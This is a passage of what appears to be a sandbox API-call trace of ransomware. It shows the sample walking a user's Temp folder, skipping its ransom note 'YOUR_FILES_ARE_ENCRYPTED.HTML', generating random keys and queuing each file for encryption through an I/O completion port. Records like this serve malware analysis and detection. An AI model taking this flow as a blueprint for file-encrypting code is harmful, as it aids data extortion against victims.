[0164.254] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa36bb80, ftCreationTime.dwHighDateTime=0x1d7e61e, ftLastAccessTime.dwLowDateTime=0x44a14e40, ftLastAccessTime.dwHighDateTime=0x1d7e6da, ftLastWriteTime.dwLowDateTime=0x44a14e40, ftLastWriteTime.dwHighDateTime=0x1d7e6da, nFileSizeHigh=0x0, nFileSizeLow=0x16545, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="QEcAKn3l.mp3", cAlternateFileName="")) returned 1 [0164.254] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3") returned 55 [0164.254] lstrcmpW (lpString1="QEcAKn3l.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.254] PathFindExtensionW (pszPath="QEcAKn3l.mp3") returned=".mp3" [0164.254] lstrlenW (lpString=".mp3") returned 4 [0164.254] PathFindExtensionW (pszPath="QEcAKn3l.mp3") returned=".mp3" [0164.254] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\qecakn3l.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0164.255] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=91461) returned 1 [0164.255] GetProcessHeap () returned 0x270000 [0164.255] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76181a8 [0164.258] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="97") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="25") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="BF") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="9F") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="87") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="10") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="E3") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="1B") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="EE") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="D5") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="C0") returned 2 [0164.258] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="64") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="4E") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="72") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="82") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="33") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="7D") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="22") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="79") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="15") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="FC") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="A8") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="95") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="80") returned 2 [0164.259] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="95") returned 2 [0164.259] lstrcpyW (in: lpString1=0x762825c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\QEcAKn3l.mp3" [0164.260] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x76181a8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.260] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76181a8, lpOverlapped=0x76181a8) returned 1 [0164.260] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc5c74cd0, ftCreationTime.dwHighDateTime=0x1d7dace, ftLastAccessTime.dwLowDateTime=0xed472530, ftLastAccessTime.dwHighDateTime=0x1d7e29b, ftLastWriteTime.dwLowDateTime=0xed472530, ftLastWriteTime.dwHighDateTime=0x1d7e29b, nFileSizeHigh=0x0, nFileSizeLow=0x719b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="saKgVJ8BvE0.pdf", cAlternateFileName="SAKGVJ~1.PDF")) returned 1 [0164.260] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf") returned 58 [0164.260] lstrcmpW (lpString1="saKgVJ8BvE0.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.260] PathFindExtensionW (pszPath="saKgVJ8BvE0.pdf") returned=".pdf" [0164.260] lstrlenW (lpString=".pdf") returned 4 [0164.260] PathFindExtensionW (pszPath="saKgVJ8BvE0.pdf") returned=".pdf" [0164.260] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.260] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\sakgvj8bve0.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0164.261] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=29083) returned 1 [0164.261] GetProcessHeap () returned 0x270000 [0164.261] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7640300 [0164.265] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D1") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="1C") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="24") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="49") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="62") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="0F") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="7B") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="20") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="1A") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="0F") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="B3") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="E5") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="C6") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="16") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="79") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CA") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="38") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="83") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="9E") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="19") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="81") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="79") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="EA") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="32") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="B4") returned 2 [0164.265] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="29") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="89") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="EB") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="F5") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="C1") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="19") returned 2 [0164.266] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="34") returned 2 [0164.266] lstrcpyW (in: lpString1=0x76503b4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\saKgVJ8BvE0.pdf" [0164.266] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7640300, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.266] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7640300, lpOverlapped=0x7640300) returned 1 [0164.266] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2ae7130, ftCreationTime.dwHighDateTime=0x1d7dee6, ftLastAccessTime.dwLowDateTime=0xe5dab740, ftLastAccessTime.dwHighDateTime=0x1d7e5b0, ftLastWriteTime.dwLowDateTime=0xe5dab740, ftLastWriteTime.dwHighDateTime=0x1d7e5b0, nFileSizeHigh=0x0, nFileSizeLow=0x2a63, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="SWYB2x61O.ods", cAlternateFileName="SWYB2X~1.ODS")) returned 1 [0164.266] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods") returned 56 [0164.266] lstrcmpW (lpString1="SWYB2x61O.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.267] PathFindExtensionW (pszPath="SWYB2x61O.ods") returned=".ods" [0164.267] lstrlenW (lpString=".ods") returned 4 [0164.267] PathFindExtensionW (pszPath="SWYB2x61O.ods") returned=".ods" [0164.267] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\swyb2x61o.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c4 [0164.267] GetFileSizeEx (in: hFile=0x5c4, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=10851) returned 1 [0164.267] GetProcessHeap () returned 0x270000 [0164.267] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7668458 [0164.271] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="AC") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="0B") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="73") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="59") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="F9") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="91") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="CE") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="F9") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="51") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="AE") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="A0") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="54") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="66") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="E4") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="39") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="2A") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="98") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="2F") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="AA") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="23") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="2C") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="9F") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="F7") returned 2 [0164.271] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="69") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D6") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="74") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="9C") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="15") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="12") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="BA") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="64") returned 2 [0164.272] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="14") returned 2 [0164.272] lstrcpyW (in: lpString1=0x767850c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\SWYB2x61O.ods" [0164.272] CreateIoCompletionPort (FileHandle=0x5c4, ExistingCompletionPort=0x3a0, CompletionKey=0x7668458, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.272] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7668458, lpOverlapped=0x7668458) returned 1 [0164.272] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1ed33920, ftCreationTime.dwHighDateTime=0x1d7e271, ftLastAccessTime.dwLowDateTime=0x9d020780, ftLastAccessTime.dwHighDateTime=0x1d7e65a, ftLastWriteTime.dwLowDateTime=0x9d020780, ftLastWriteTime.dwHighDateTime=0x1d7e65a, nFileSizeHigh=0x0, nFileSizeLow=0x14d14, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="TtwMJP07.jpg", cAlternateFileName="")) returned 1 [0164.272] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg") returned 55 [0164.272] lstrcmpW (lpString1="TtwMJP07.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.273] PathFindExtensionW (pszPath="TtwMJP07.jpg") returned=".jpg" [0164.273] lstrlenW (lpString=".jpg") returned 4 [0164.273] PathFindExtensionW (pszPath="TtwMJP07.jpg") returned=".jpg" [0164.273] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.273] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\ttwmjp07.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5c8 [0164.273] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=85268) returned 1 [0164.273] GetProcessHeap () returned 0x270000 [0164.273] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76905b0 [0164.277] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="60") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="8C") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="74") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="A4") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="85") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="24") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="7A") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="55") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="7F") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="C3") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="5F") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="89") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="CA") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="7F") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="14") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="CB") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="A6") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="5D") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="F0") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="A6") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="E7") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="BE") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="DF") returned 2 [0164.277] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="B6") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="34") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="4D") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="D0") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="D1") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="1C") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="1C") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="AF") returned 2 [0164.278] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="70") returned 2 [0164.278] lstrcpyW (in: lpString1=0x76a0664, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\TtwMJP07.jpg" [0164.278] CreateIoCompletionPort (FileHandle=0x5c8, ExistingCompletionPort=0x3a0, CompletionKey=0x76905b0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.278] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76905b0, lpOverlapped=0x76905b0) returned 1 [0164.278] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x100d3930, ftCreationTime.dwHighDateTime=0x1d7d859, ftLastAccessTime.dwLowDateTime=0xa756b80, ftLastAccessTime.dwHighDateTime=0x1d7e382, ftLastWriteTime.dwLowDateTime=0xa756b80, ftLastWriteTime.dwHighDateTime=0x1d7e382, nFileSizeHigh=0x0, nFileSizeLow=0x71ab, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="u47c.docx", cAlternateFileName="U47C~1.DOC")) returned 1 [0164.278] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx") returned 52 [0164.279] lstrcmpW (lpString1="u47c.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.279] PathFindExtensionW (pszPath="u47c.docx") returned=".docx" [0164.279] lstrlenW (lpString=".docx") returned 5 [0164.279] PathFindExtensionW (pszPath="u47c.docx") returned=".docx" [0164.279] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.279] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\u47c.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5cc [0164.279] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=29099) returned 1 [0164.279] GetProcessHeap () returned 0x270000 [0164.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x76b8708 [0164.283] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="3B") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="DB") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="0E") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="7C") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="BF") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="DB") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="1F") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="BF") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="D8") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="E7") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F5") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="84") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="7B") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="64") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd762, param_2="%02X" | out: param_1="D8") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="44") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="A4") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="D8") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="30") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="2F") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="B2") returned 2 [0164.283] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="86") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="46") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="34") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="D0") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="E9") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="44") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="84") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="A1") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A2") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="D4") returned 2 [0164.284] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="41") returned 2 [0164.284] lstrcpyW (in: lpString1=0x76c87bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\u47c.docx" [0164.284] CreateIoCompletionPort (FileHandle=0x5cc, ExistingCompletionPort=0x3a0, CompletionKey=0x76b8708, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.284] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x76b8708, lpOverlapped=0x76b8708) returned 1 [0164.284] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xec9ba9d0, 